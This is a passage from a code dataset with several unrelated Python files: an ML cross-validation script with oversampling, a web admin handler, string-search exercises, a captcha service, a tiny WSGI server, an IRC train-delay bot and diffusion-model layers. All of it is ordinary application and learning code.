è possibile utilizzare anche altre configurazioni.\n :param dataset: dataset da utilizzare per la cross validation\n :param target: vettore che contiene l'etichetta di classe per ogni entry\n :param dataset_name: nome del dataset che viene utilizzato\n :param n_fold: specifica il numero di fold che verranno utilizzati dalla cross validation\n :param labels: etichette di classe del target\n :param risk_level: livello di rischio per cui si sta effettuando la classificazione\n :param percentage: indica la percentuale di elementi ripetuti nell'oversampling rispetto alla lunghezza del dataset iniziale. Di default viene effettuato oversampling andando ad utilizzare un egual numero di entry per tutte le classi.\n \"\"\"\n random_state = 94\n year = dataset_name[len(dataset_name) - 35:len(dataset_name) - 31]\n filename_statistics = \"./statistics_\" + year + \"/statistics_\" + year + \"_\" + risk_level + \".txt\"\n\n # Se il livello di rischio e' cost_caused_claim, trasformo il problema in binario (cost_caused_claim contiene 4 target differenti di default)\n if risk_level == 'cost_caused_claim':\n targetA_012_B_3 = []\n for i in range(0, len(target)):\n if target[i] != 3:\n targetA_012_B_3.append(0)\n else:\n targetA_012_B_3.append(1)\n labels = ['ClassA (range1,2,3)', 'ClassB (range 4)']\n target = np.array(targetA_012_B_3).astype(int)\n\n # Prendo i modelli (e i suoi nomi) ordinati per il parametro passato (r,p,f,m)\n models, clfs_name, baggings, max_features, max_samples = get_clf_ordered(risk_level, \"r\")\n\n print(\"\\n##### CROSS VALIDATION RUN ########\")\n if percentage == -1:\n print(\"Run oversampling without percentage\\n\")\n else:\n print(\"Run oversampling with percentage for the less populous class: \" + str(percentage) + \"%\")\n print(\"Number of cluster: \" + str(n_cluster)+\"\\n\")\n start = time.time()\n\n #Inizializzo le liste che conterranno i risultati\n y_test_tot = dict()\n predicted_tot = dict()\n index_dict = 0\n for n_of_clf in range(2, len(clfs_name) + 1):\n for n_right in range(2, n_of_clf + 1):\n y_test_tot[index_dict] = np.array([])\n predicted_tot[index_dict] = np.array([])\n index_dict = index_dict + 1\n\n #Normalizzo il dataset per effettuare il KMeans\n\n\n if cluster_both_class == True:\n dataset_discretized = preprocessing.normalize(dataset, norm='l2')\n cl = KMeans(n_clusters=n_cluster).fit(dataset_discretized)\n clusters = cl.labels_\n else:\n dataset_B =[]\n target_B = []\n\n for i_t, t in enumerate(target):\n if t==1:\n dataset_B.append(dataset[i_t])\n target_B.append(t)\n\n\n dataset_discretized_B = preprocessing.normalize(dataset_B, norm='l2')\n cl = KMeans(n_clusters=n_cluster).fit(dataset_discretized_B)\n clusters_B = cl.labels_\n\n clusters = []\n find_c = 0\n for t in target:\n if t == 0:\n clusters.append(-1)\n else:\n clusters.append(clusters_B[find_c])\n find_c = find_c+1\n clusters = np.array(clusters).astype(int)\n\n # Utilizzo la StratifiedKFold per creare i fold\n kf = StratifiedKFold(n_splits=n_fold, random_state=random_state, shuffle=False).split(dataset, target)\n k = 1\n for train_index, test_index in kf:\n print(\"####### Fold \" + str(k) + \"/\" + str(n_fold) + \" #######\")\n\n # Separo il training set e il test set\n X_train, X_test = dataset[train_index], dataset[test_index]\n y_train, y_test = target[train_index], target[test_index]\n #Mi prendo solamente le label ti cluster di mio interesse (quelle che stanno nel training)\n clusters_train = clusters[train_index]\n\n # Applico l'oversampling.\n # Di default l'oversampling fa in modo di avere un training set con un egual numero di elementi per tutte le classi.\n if percentage == -1:\n X_train, y_train = ADASYN().fit_sample(X_train, y_train)\n else:\n # E' possibile (settando il parametro percentage) avere un numero di elementi della classe meno popolosa pari ad una percentuale del dataset iniziale.\n # In entrambi i casi gli elementi su cui verrà fatto oversampling sono scelti in modo randomico.\n\n # Come si prende una percentuale di elementi in modo randomico?\n # Selezioni gli indici della classe meno popolosa\n count_in_train = 0\n for i in range(0, len(y_train)):\n if y_train[i] == 1:\n count_in_train = count_in_train + 1\n\n # Calcolo cB_tot, ovvero in numero di elementi che dovrò avere per raggiungere la percentuale di oversampling specificata\n cB_perc = float(percentage)\n tot = float(len(y_train))\n cB_tot = int((cB_perc / 100.0) * tot) - count_in_train\n\n # cB_tot mi rappredsenta il numero di elementi che voglio ancora\n\n #Conto quanti elementi ho per ogni label di clustering\n counter_cluster_train = []\n for i_c in range(0, n_cluster, 1):\n counter_cluster_train.append(0)\n #capisco quindi com'è fatta la popolazione\n for i_t, cluster_target in enumerate(clusters_train):\n if y_train[i_t] == 1:\n counter_cluster_train[cluster_target] = counter_cluster_train[cluster_target] + 1\n\n # Capisco quanti dati devono essere aggiunti per ogni target al fine di rispecchiare la percentuale\n cB_tot_x_cluster = int(cB_tot / 5.0)\n\n #Calcolo quanti elementi devono essere aggiunti per ogni label di cluster per il target 1\n to_add_cluster_counter = []\n for i_c in range(0, n_cluster, 1):\n to_append = 0\n if cB_tot_x_cluster - counter_cluster_train[i_c] > 0:\n to_append = cB_tot_x_cluster - counter_cluster_train[i_c]\n to_add_cluster_counter.append(to_append)\n\n #Aggiungo gli elementi\n for i_c, cB_tot_cluster in enumerate(to_add_cluster_counter):\n r_index_B = []\n cB_tot_cluster_added = 0\n #Prendo elementi finchè non raggiungo cB_tot_cluster, cioè la quota da aggiungere desiderata\n while cB_tot_cluster_added < cB_tot_cluster:\n random_index = random.randint(0, len(clusters_train) - 1)\n #Prendo solamente gli indici che sono della mia etichetta di cluster e con target 1, non sono interessato logicamente a fare oversampling sul target 0\n if clusters_train[random_index] == i_c and y_train[random_index] == 1:\n r_index_B.append(random_index)\n cB_tot_cluster_added = cB_tot_cluster_added + 1\n\n\n # Aggancio questi elementi al training set\n X_train = np.array(list(X_train) + list(X_train[r_index_B])).astype(int)\n y_train = np.array(list(y_train) + list(y_train[r_index_B])).astype(int)\n\n k = k + 1\n clfs_already_trained = []\n progress_clf = 0\n # Eseguo il training con i vari classificatori\n for model, name, bagging, max_feature, max_sample in zip(models, clfs_name, baggings, max_features, max_samples):\n print(\"\\rTraining progress: \" + str(int((float(progress_clf) / float(len(clfs_name))) * 100)) + \"%\", end=\"\")\n # Applico l'operatore di bagging\n if bagging==True:\n clf = BaggingClassifier(model, n_estimators=7, max_samples=max_sample, max_features=max_feature, random_state=random_state)\n else:\n clf = model\n # Appendo il classificatore (su cui si è già fatto il training) a clfs_already_trained.\n # Tale lista sarà utilie in fase di testing.\n clfs_already_trained.append(clf.fit(X_train, y_train))\n progress_clf = progress_clf + 1\n print(\"\\rTraining progress: \" + str(int((float(progress_clf) / float(len(clfs_name))) * 100)) + \"%\", end=\"\")\n print(\"\\n\")\n all_predicted_clf = []\n for clf in clfs_already_trained:\n all_predicted_clf.append(clf.predict(X_test))\n\n # Effettuo tutte le predizioni utilizzando il test set.\n # Tali predizioni verranno effettuate su tutte le possibili conbinazioni di n_right e n_of_clf e verranno\n # salvate all'interno del file excel al fine di permetterne la visione\n index_dict = 0\n for n_of_clf in range(2, len(clfs_name) + 1):\n predicted_clf = all_predicted_clf[:n_of_clf]\n for n_right in range(2, n_of_clf + 1):\n predicted = []\n for i in range(0, len(predicted_clf[0])):\n counter_right = 0\n for j in range(0, n_of_clf):\n if predicted_clf[j][i] == 1:\n counter_right = counter_right + 1\n if (counter_right >= n_right):\n predicted.append(1)\n else:\n predicted.append(0)\n y_test_tot[index_dict] = np.append(y_test_tot[index_dict], y_test)\n predicted_tot[index_dict] = np.append(predicted_tot[index_dict], predicted)\n index_dict = index_dict + 1\n\n # Stampo tutte le statistiche su di un file\n end = time.time()\n index_dict = 0\n for n_of_clf in range(2, len(clfs_name) + 1):\n for n_right in range(2, n_of_clf + 1):\n y_test_tot_iter = y_test_tot[index_dict].astype(int)\n predicted_tot_iter = predicted_tot[index_dict].astype(int)\n\n with open(filename_statistics, \"a\") as myfile:\n myfile.write(\"####### CROSS VALIDATION START #######\\n\\n\")\n myfile.write(\"############ INFORMATIONS ############\\n\")\n myfile.write(\"Cross validation fold: \" + str(n_fold) + \"\\n\")\n if percentage == -1:\n myfile.write(\"Run oversampling without percentage\\n\")\n else:\n myfile.write(\n \"Run oversampling with percentage for the less populous class: \" + str(percentage) + \"%\\n\")\n\n myfile.write(\n \"Number of equal prediction between classification for less populous class: \" + str(n_right) + \"\\n\")\n myfile.write(\"Number of classifier used: \" + str(n_of_clf) + \"\\n\")\n myfile.write(\"Number of cluster: \" + str(n_cluster) + \"\\n\")\n if cluster_both_class == True:\n myfile.write(\"Classes used for clustering: \" + str(\"A, B\") + \"\\n\")\n else:\n myfile.write(\"Classes used for clustering: \" + str(\"A\") + \"\\n\")\n myfile.write(\"######################################\\n\")\n myfile.write(\"\\nElapsed times for cross validation: \" + timer(start, end) + \"\\n\")\n acc = accuracy_score(y_test_tot_iter, predicted_tot_iter, normalize=True, sample_weight=None)\n myfile.write(\"Accuracy on the prediction: \")\n print(\"%.2f\" % acc, file=myfile)\n print(\"\", file=myfile)\n myfile.write(\"Confusion Matrix\\n\")\n cm = conf_matr(y_test_tot_iter, predicted_tot_iter)\n print(pd.DataFrame(cm, index=labels, columns=labels), file=myfile)\n myfile.write(\"\\n\")\n print(classification_report(y_test_tot_iter, predicted_tot_iter, target_names=labels), file=myfile)\n myfile.write(\"\\n\\n\")\n myfile.close()\n index_dict = index_dict + 1\n\n\ndef timer(start, end):\n hours, rem = divmod(end - start, 3600)\n minutes, seconds = divmod(rem, 60)\n return \"{:0>2}:{:0>2}:{:05.2f}\".format(int(hours), int(minutes), seconds)\n\n\ndef get_key(labels, label):\n for key, value in labels.items():\n if value == label:\n return key\n\n\ndef tree_as_pdf(dataset, target, features, path, labels):\n \"\"\"\nElabora l'albero di decisione come pdf e lo salva nel path specificato\n :param dataset: dataset su cui eseguire il training\n :param target: target su cui eseguire il training\n :param features: attributi su cui si è basato l'albero di decisione\n :param path: dove salvare il file\n \"\"\"\n\n if os.path.isdir(\"./dtree\") == False:\n os.mkdir(\"./dtree\")\n path = \"./dtree/\" + path\n\n print(\"Save the decision tree as pdf file into \" + path)\n tree = DecisionTreeClassifier(max_depth=5).fit(dataset, target)\n tr.export_graphviz(tree,\n out_file='temp.dot', feature_names=features)\n\n # Converte i numeri del .dot alle label corrette\n with open('./temp.dot', \"r\") as f:\n lines = f.readlines()\n f.close()\n with open('./temp.dot', \"w\") as f:\n for line in lines:\n split_gini = line.split(r\"\\ngini\")\n if len(split_gini) > 1:\n number_gini = split_gini[0].split(\" \")\n label = labels[int(float(number_gini[3]))]\n line = line.replace(number_gini[3], label)\n f.write(line + \"\\n\")\n f.close\n\n call(['dot', '-Tpdf', 'temp.dot', '-o', path])\n print(\"Done!\")\n os.remove('temp.dot')\n\n\ndef to_num_date(date):\n # input: formato 01JAN1990\n pattern = re.compile(\"[^0-31][0-31].*\")\n if pattern.search(date) is None:\n return date\n months = dict()\n months['JAN'] = 1;\n months['FEB'] = 2;\n months['MAR'] = 3;\n months['APR'] = 4;\n months['MAY'] = 5;\n months['JUN'] = 6;\n months['JUL'] = 7;\n months['AUG'] = 8;\n months['SEP'] = 9;\n months['OCT'] = 10;\n months['NOV'] = 11;\n months['DEC'] = 12;\n month_str = str(date[2:5])\n day_str = date.split(month_str)\n day = day_str[0]\n year = day_str[1]\n conv_date = str(year + \"/\" + str(months[month_str]).zfill(2) + \"/\" + day)\n return conv_date\n\n\ndef get_clf_ordered(risk_level, order):\n \"\"\"\n A partire da un livello di rischio, torna la configurazione migliore basandosi sulla recall\n :param risk_level: livello di rischio di interesse\n \"\"\"\n\n ######## n_caused_claim ########\n classifiers_n_caused_claim = [\n QuadraticDiscriminantAnalysis(),\n GaussianNB(),\n AdaBoostClassifier(),\n DecisionTreeClassifier(max_depth=5),\n ]\n\n names_n_caused_claim = [\n \"QDA\",\n \"Naive Bayes\",\n \"AdaBoost\",\n \"Decision Tree\",\n ]\n\n bagging_n_caused_claim = [\n True,\n True,\n True,\n True,\n ]\n\n #Ordinati per recall\n max_features_n_caused_claim = [\n 0.55,\n 0.775,\n 1.0,\n 1.0,\n ]\n\n max_samples_n_caused_claim = [\n 0.325,\n 0.55,\n 0.325,\n 0.1,\n ]\n ######################\n\n ######## NNC ########\n classifiers_NNC = [\n QuadraticDiscriminantAnalysis(),\n GaussianNB(),\n AdaBoostClassifier(),\n DecisionTreeClassifier(max_depth=5),\n ]\n\n names_NNC = [\n \"QDA\",\n \"Naive Bayes\",\n \"AdaBoost\",\n \"Decision Tree\",\n ]\n\n bagging_NNC = [\n True,\n True,\n True,\n True,\n ]\n\n # Ordinati per recall\n max_features_NNC = [\n 0.55,\n 0.325,\n 1.0,\n 1.0,\n ]\n\n max_samples_NNC = [\n 1.0,\n 0.55,\n 1.0,\n 0.325,\n ]\n\n ######################\n\n ######## n_caused_claim ########\n classifiers_NCD = [\n QuadraticDiscriminantAnalysis(),\n GaussianNB(),\n DecisionTreeClassifier(max_depth=5),\n AdaBoostClassifier(),\n ]\n\n names_NCD = [\n \"QDA\",\n \"Naive Bayes\",\n \"Decision Tree\",\n \"AdaBoost\",\n ]\n\n bagging_NCD = [\n True,\n True,\n True,\n True,\n ]\n\n # Ordinati per recall\n max_features_NCD = [\n 0.55,\n 0.325,\n 1.0,\n 1.0,\n ]\n\n max_samples_NCD = [\n 0.325,\n 0.325,\n 0.1,\n 1.0,\n ]\n\n ######################\n\n ######## n_caused_claim ########\n classifiers_cost_caused_claim = [\n QuadraticDiscriminantAnalysis(),\n GaussianNB(),\n DecisionTreeClassifier(max_depth=5),\n AdaBoostClassifier(),\n ]\n\n names_cost_caused_claim = [\n \"QDA\",\n \"Naive Bayes\",\n \"Decision Tree\",\n \"AdaBoost\",\n ]\n\n bagging_cost_caused_claim = [\n True,\n True,\n False,\n True,\n ]\n\n # Ordinati per recall\n max_features_cost_caused_claim = [\n 0.55,\n 0.325,\n 0.0,\n 1.0,\n ]\n\n max_samples_cost_caused_claim = [\n 0.775,\n 0.55,\n 0.0,\n 1.0,\n ]\n\n ######################\n\n\n if risk_level == 'cost_caused_claim':\n return classifiers_cost_caused_claim, names_cost_caused_claim, bagging_cost_caused_claim, max_features_cost_caused_claim, max_samples_cost_caused_claim\n if risk_level == 'n_caused_claim':\n return classifiers_n_caused_claim, names_n_caused_claim, bagging_n_caused_claim, max_features_n_caused_claim, max_samples_n_caused_claim\n if risk_level == 'NCD':\n return classifiers_NCD, names_NCD, bagging_NCD, max_features_NCD, max_samples_NCD\n if risk_level == 'NNC':\n return classifiers_NNC, names_NNC, bagging_NNC, max_features_NNC, max_samples_NNC","sub_path":"Contenuto nuovo/Testing Clustered Oversampling (class A and B)/SKLearn.py","file_name":"SKLearn.py","file_ext":"py","file_size_in_byte":24277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428438427","text":"from subject_page import *\r\nfrom action_query import ActionQuery\r\n\r\nclass huodong(BaseSubject):\r\n def __init__(self):\r\n BaseSubject.__init__(self)\r\n\r\n def execute(self):\r\n if self.loginUser == None:\r\n return self.LOGIN\r\n\r\n if self.isAdmin == False and self.isContentAdmin() == False:\r\n self.addActionError(u\"您你没有管理的权限!\")\r\n return self.ERROR\r\n \r\n if request.getMethod() == \"POST\":\r\n self.post_action()\r\n self.clear_subject_cache()\r\n \r\n return self.action_list()\r\n \r\n def action_list(self):\r\n qry = ActionQuery(\"\"\" act.actionId, act.title, act.ownerType, act.ownerId, act.createDate, act.startDateTime,\r\n act.finishDateTime, act.createUserId, act.actionType, act.status \"\"\")\r\n qry.ownerId = self.subject.subjectId\r\n qry.ownerType = \"subject\"\r\n qry.status = None\r\n pager = self.params.createPager()\r\n pager.itemName = u\"活动\"\r\n pager.itemUnit = u\"个\"\r\n pager.pageSize = 25\r\n pager.totalRows = qry.count()\r\n action_list = qry.query_map(pager)\r\n request.setAttribute(\"subject\", self.subject)\r\n request.setAttribute(\"action_list\", action_list)\r\n return \"/WEB-INF/subjectmanage/action.ftl\"\r\n \r\n def post_action(self):\r\n act_svc = __spring__.getBean(\"actionService\")\r\n cmd = self.params.safeGetStringParam(\"cmd\")\r\n if cmd == \"\":\r\n action_status = -200\r\n else:\r\n action_status = int(cmd) \r\n guids = self.params.safeGetIntValues(\"guid\")\r\n for id in guids:\r\n action = act_svc.getActionById(id)\r\n if action != None:\r\n if action_status == -2:\r\n act_svc.deleteAction(action)\r\n else:\r\n act_svc.updateActionStatus(action_status, id)\r\n","sub_path":"WebContent/subject/manage/huodong.py","file_name":"huodong.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"60426890","text":"class Solution():\n def strStr(source, target):\n # write your code here\n if source is None or target is None:\n return -1\n\n if source == target:\n return 0\n\n if target == \"\":\n return 0\n\n l_source = list(source)\n l_target = list(target)\n for i, s in enumerate(l_source):\n match = False\n if l_target[0] == s:\n if i + len(l_target) > len(l_source):\n return -1\n for j, t in enumerate(l_target):\n if t != l_source[i+j]:\n break\n if j == len(l_target) - 1:\n match = True\n\n if match:\n return i\n\n return -1\n\nclass Solution1():\n def strStr1(source, target):\n if source is None or target is None:\n return -1\n\n if source == target:\n return 0\n\n if target == \"\":\n return 0\n\n if len(source) < len(target):\n return -1\n\n slist = list(source)\n tlist = list(target)\n\n t_len = len(tlist)\n for i in range(len(source)):\n if source[i:i+t_len] == target:\n return i\n\n return -1\n\nclass Solution2:\n def strStr(self, haystack, needle):\n \"\"\"\n :type haystack: str\n :type needle: str\n :rtype: int\n \"\"\"\n if haystack is None or needle is None:\n return -1\n\n if haystack == needle:\n return 0\n\n if needle == \"\":\n return 0\n\n if haystack == \"\":\n return -1\n\n if len(haystack) <= len(needle):\n return -1\n\n hlist = list(haystack)\n nlist = list(needle)\n pos = -1\n for i, h in enumerate(hlist):\n if h != nlist[0]:\n continue\n if i + len(nlist) - 1 > len(hlist):\n return -1\n pos = i\n for j in range(1, len(nlist)):\n if i + j >= len(hlist) or hlist[i+j] != nlist[j]:\n pos = -1\n break\n if pos != -1:\n return pos\n\n return pos\n\nif __name__ == \"__main__\":\n sln = Solution2()\n res = sln.strStr(\"mississippi\", \"pi\")\n print(res)","sub_path":"leet/source/string/strStr.py","file_name":"strStr.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111409621","text":"import os\nfrom lib.tactic_base_script import TacticBaseScript\nfrom lib.tactic_server import active_server\n\nclass ExportMaxPosition(TacticBaseScript):\n \"\"\"\n Export max position from tactic to a file that will be used by the publishing\n scripts of the web application\n \"\"\"\n\n def getMaxPositionMapping(self, locator):\n return {\n 'flexstrip': 'strip',\n 'hanging' :'ceiling',\n 'hla' :'table',\n 'inceiling':'ceiling',\n 'infloor': 'floor',\n 'inwall': 'wall',\n 'onceiling': 'ceiling',\n 'onfloor': 'floor',\n 'ontable': 'table',\n 'onwall': 'wall',\n 'pedestal': 'floor',\n 'strip': 'strip',\n }[locator]\n\n def execute(self):\n max_locator_types = ['flexstrip','hanging','hla', 'inceiling',\n 'infloor','inwall', 'onceiling','onfloor',\n 'ontable', 'onwall', 'pedestal', 'strip']\n #exportFile = self.server.create_and_open_file('export_max_position')\n with self.server.create_and_open_file('export_max_position') as exportFile:\n with self.transaction() as session:\n for luminaire in session.get_all_luminaires(show_retired = True):\n max_locator_type = luminaire.get('max_locator_type')\n if max_locator_type in max_locator_types:\n locator = self.getMaxPositionMapping(max_locator_type)\n for ctn9 in luminaire.get_ctn9_list():\n exportFile.write(\"{0},{1}\\n\".format(ctn9, locator))\n\nif __name__ == '__main__':\n ExportMaxPosition.run(active_server())\n","sub_path":"python_scripts/cron_jobs/export_max_positions.py","file_name":"export_max_positions.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"347960800","text":"# coding=utf-8\n\nfrom tornado import gen\nfrom service.page.base import PageService\nfrom util.common import ObjectDict\n\n\nclass CaptchaPageService(PageService):\n\n def __init__(self):\n super().__init__()\n\n @gen.coroutine\n def post_verification(self, captcha, channel, account_id, position_id, param_id):\n \"\"\"\n :param captcha: 回流的平台编号。1 前程无忧,2 猎聘,3 智联, 6 最佳东方, 7 一览英才\n :param channel: 验证码\n :param account_id: 第三方渠道账号ID\n :param position_id:职位ID\n :param param_id:\n :return:\n \"\"\"\n\n req = ObjectDict({\n 'info': captcha,\n 'channel': channel,\n 'accountId': account_id,\n 'positionId': position_id,\n 'paramId': param_id\n })\n res = yield self.infra_captcha_ds.post_verification(req)\n status, message = res.status, res.message\n return status, message\n\n @gen.coroutine\n def get_verification_params(self, param_id):\n \"\"\"\n 获取生成验证页面的相关参数\n :param param_id:\n :return:\n \"\"\"\n req = ObjectDict({'paramId': param_id})\n res = yield self.infra_captcha_ds.get_verification_params(req)\n message, data, status = res.message, res.data, res.status\n ret = ObjectDict()\n if data:\n ret['channel'] = data.channel\n ret['accountId'] = data.accountId\n ret['mobile'] = data.mobile\n ret['positionId'] = data.positionId\n return message, ret, status\n\n\n","sub_path":"service/page/captcha/captcha.py","file_name":"captcha.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"160393936","text":"from socket import *\nfrom multiprocessing import *\nimport re\nimport sys\n\nWSGI_PYTHON_DIR = \"/home/banban/web\"\n\nclass HTTP(object):\n\tdef __init__(self, app):\n\t\tself.server_socket = socket(AF_INET, SOCK_STREAM)\n\t\tself.server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\t\tself.app = app\n\n\tdef start(self):\n\t\tself.server_socket.listen(128)\n\t\tclient_socket, client_addr = self.server_socket.accept()\n\t\tprint(\"newcommer\" + str(client_addr))\n\t\tclient_process = Process(target = self.handle_client, args = (client_socket,))\n\t\tclient_process.start()\n\t\tclient_socket.close()\n\n\tdef bind(self, port):\n\t\tself.server_socket.bind((\"\",port))\n\n\tdef handle_client(self, client_socket):\n\t\tclient_date = client_socket.recv(1024)\n\t\tclient_line = client_date.splitlines()\n\t\tclient_start_line = client_line[0].decode(\"utf-8\")\n\t\trequire_name = re.match(r\"\\w+ +(/[^ ]*) \", client_start_line).group(1)\n\t\tenv = {\n\t\t\t\"PATH\" : require_name\n\t\t}\n\t\tresponse_body = self.app(env, self.start_response)\n\t\tresponse = self.response_headers + \"\\r\\n\" + response_body\n\t\tclient_socket.send(bytes(response, \"utf-8\"))\n\t\tclient_socket.close()\n\n\tdef start_response(self, status, heraders):\n\t\tresponse_headers = \"HTTP/1.1 \" + status + \"\\r\\n\" \n\t\tfor header in heraders:\n\t\t\tresponse_headers += \"%s:%s\\r\\n\"%header\n\t\tself.response_headers = response_headers\n\ndef main():\n\tsys.path.insert(1, WSGI_PYTHON_DIR)\n\tmodule_name, app_name = sys.argv[1].split(\":\")\n\tm = __import__(module_name)\n\tapp = getattr(m, app_name)\n\thttp = HTTP(app)\n\thttp.bind(8888)\n\thttp.start()\n\nif __name__ == '__main__':\n\tmain()\t\t\n","sub_path":"web/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"70502122","text":"import asyncio\nfrom ircbot.plugin import BotPlugin\nfrom datetime import datetime, timedelta\nfrom datetime import time as dtime\nimport itertools\nimport functools\nimport aiohttp\n\nCENTRAL = \"Brussels-Central\"\nCHAPELLE = \"Brussels-Chapelle/Brussels-Kapellekerk\"\n\nTRAIN_TIMES = [\n (dtime( 7, 15), dtime( 8, 15), CENTRAL, \"S11778\"), # 07:51\n (dtime( 8, 15), dtime( 9, 15), CENTRAL, \"S11779\"), # 08:51\n (dtime( 9, 15), dtime(10, 15), CENTRAL, \"S11780\"), # 09:52\n (dtime(10, 15), dtime(11, 15), CENTRAL, \"S11781\"), # 10:52\n (dtime(11, 15), dtime(12, 15), CENTRAL, \"S11782\"), # 11:52\n\n (dtime(15, 15), dtime(16, 15), CHAPELLE, \"S11765\"), # 16:06\n (dtime(16, 15), dtime(17, 15), CHAPELLE, \"S11766\"), # 17:06\n (dtime(17, 15), dtime(18, 15), CHAPELLE, \"S11767\"), # 18:05\n (dtime(18, 15), dtime(19, 20), CHAPELLE, \"S11768\"), # 19:05\n]\n\nRULES = {\n 'train_morning': [\n {\"hour\": [9], \"minute\": [40, 50], \"weekday\": [0, 1, 2, 3, 4]},\n ],\n 'train_evening': [\n {\"hour\": [17], \"minute\": [49, 59], \"weekday\": [0, 1, 2, 3, 4]},\n ],\n # 'metro': [\n # {\"hour\": [9], \"minute\": [15], \"weekday\": [1, 2, 3, 4, 5]},\n # ],\n}\n\n\ndef next_day(weekday, hour=0, minute=0, second=0):\n now = datetime.now()\n d_days = (weekday - now.weekday()) % 7\n day = now + timedelta(days=d_days)\n if d_days == 0 and dtime(hour, minute, second) < now.time():\n day += timedelta(days=7)\n return day.replace(hour=hour, minute=minute, second=second, microsecond=0)\n\n\nclass StationMaster(BotPlugin):\n def __init__(self):\n self.loop = asyncio.get_event_loop()\n\n def get_next_instant(self, event_type):\n rules = RULES[event_type]\n expanded_rules = itertools.chain(*(\n itertools.product(rule[\"weekday\"], rule[\"hour\"], rule['minute'])\n for rule in rules\n ))\n expanded_rules = list(expanded_rules)\n days = [next_day(*rule) for rule in expanded_rules]\n return min(days)\n\n def event(self, event_type):\n self.set_next_call(event_type)\n fun = getattr(self, \"run_%s\" % event_type)\n assert asyncio.iscoroutinefunction(fun)\n asyncio.ensure_future(fun())\n\n @asyncio.coroutine\n def run_train_morning(self):\n station = \"Brussels-Central\"\n train = \"S11780\"\n data = yield from self.get_delay(train, station)\n self.say(self.format_train(train, data))\n\n @asyncio.coroutine\n def run_train_evening(self):\n station = \"Brussels-Chapelle/Brussels-Kapellekerk\"\n train = \"S11767\"\n data = yield from self.get_delay(train, station)\n if data['delay'] < 5 or (data['scheduled_departure'] - datetime.now()) < timedelta(minutes=10):\n # Skip noise if no or little delay and depature is in the \"far\" future\n self.say(self.format_train(train, data))\n\n def get_delay(self, train_id, station):\n url = \"https://api.irail.be/vehicle/?id=BE.NMBS.%s&format=json\" % train_id\n\n response = yield from aiohttp.get(url)\n data = yield from response.json()\n stops = [s for s in data[\"stops\"][\"stop\"] if s[\"station\"] == station]\n if len(stops) != 1:\n raise Exception(\"More than one %s stop\" % station)\n stop = stops[0]\n departure = datetime.fromtimestamp(int(stop['scheduledDepartureTime']))\n return {\n \"canceled\": stop[\"departureCanceled\"] != \"0\",\n \"delay\": round(int(stop[\"departureDelay\"]) / 60),\n \"platform\": stop['platform'],\n \"is_normal_platform\": stop['platforminfo']['normal'] == \"1\",\n \"scheduled_departure\": departure,\n }\n\n def set_next_call(self, event_type):\n at = self.get_next_instant(event_type)\n dt = (at - datetime.now()).total_seconds()\n self.loop.call_at(\n self.loop.time() + dt,\n functools.partial(self.event, event_type)\n )\n\n @BotPlugin.on_connect\n def boot(self):\n for event_type in RULES.keys():\n self.set_next_call(event_type)\n\n def format_train(self, train, data):\n if data['canceled']:\n status_txt = \"est \" + self.bot.text.bold(self.bot.text.red(\"annulé ❌\"))\n elif data['delay'] > 0:\n status_txt = 'a un ' + self.bot.text.yellow('retard de %s min' % data['delay'])\n else:\n status_txt = 'est ' + self.bot.text.green('à temps')\n\n if data[\"is_normal_platform\"]:\n platform_txt = \"\"\n else:\n platform_txt = self.bot.text.red(\"🚉 Changement de quai : quai %s.\" % data['platform'])\n\n return \"Le %s de %s %s. %s\" % (\n train[:2],\n data['scheduled_departure'].strftime(\"%H:%M\"),\n status_txt,\n platform_txt\n )\n\n @BotPlugin.command(r'\\!teleport')\n def teleport(self, msg):\n has_ran = False\n for start, stop, station, train in TRAIN_TIMES:\n if start < datetime.now().time() < stop:\n has_ran = True\n data = yield from self.get_delay(train, station)\n msg.reply(self.format_train(train, data))\n\n if not has_ran:\n msg.reply(\"Aucun téléporteur n'est disponible pour l'instant...\")\n","sub_path":"plugins/station_master.py","file_name":"station_master.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161496045","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom torch.nn import functional as F\nimport math\n\n\nclass Mish(nn.Module):\n def forward(self, x):\n return x * torch.tanh(F.softplus(x))\n\n\nclass DiffusionEmbedding(nn.Module):\n \"\"\" Diffusion Step Embedding \"\"\"\n\n def __init__(self, d_denoiser):\n super(DiffusionEmbedding, self).__init__()\n self.dim = d_denoiser\n\n def forward(self, x):\n device = x.device\n half_dim = self.dim // 2\n emb = math.log(10000) / (half_dim - 1)\n emb = torch.exp(torch.arange(half_dim, device=device) * -emb)\n emb = x[:, None] * emb[None, :]\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb\n\n\nclass ResidualBlock(nn.Module):\n \"\"\" Residual Block \"\"\"\n\n def __init__(self, d_encoder, residual_channels, dropout):\n super(ResidualBlock, self).__init__()\n self.conv_layer = ConvNorm(\n residual_channels,\n 2 * residual_channels,\n kernel_size=3,\n stride=1,\n padding=int((3 - 1) / 2),\n dilation=1,\n )\n self.diffusion_projection = LinearNorm(residual_channels, residual_channels)\n self.conditioner_projection = ConvNorm(\n d_encoder, 2 * residual_channels, kernel_size=1 \n )\n self.output_projection = ConvNorm(\n residual_channels, 2 * residual_channels, kernel_size=1 \n )\n\n def forward(self, x, conditioner, diffusion_step, mask=None):\n\n diffusion_step = self.diffusion_projection(diffusion_step).unsqueeze(-1)\n conditioner = self.conditioner_projection(conditioner)\n\n y = x + diffusion_step\n y = self.conv_layer(y) + conditioner\n\n gate, filter = torch.chunk(y, 2, dim=1)\n y = torch.sigmoid(gate) * torch.tanh(filter)\n\n y = self.output_projection(y)\n residual, skip = torch.chunk(y, 2, dim=1)\n\n return (x + residual) / math.sqrt(2.0), 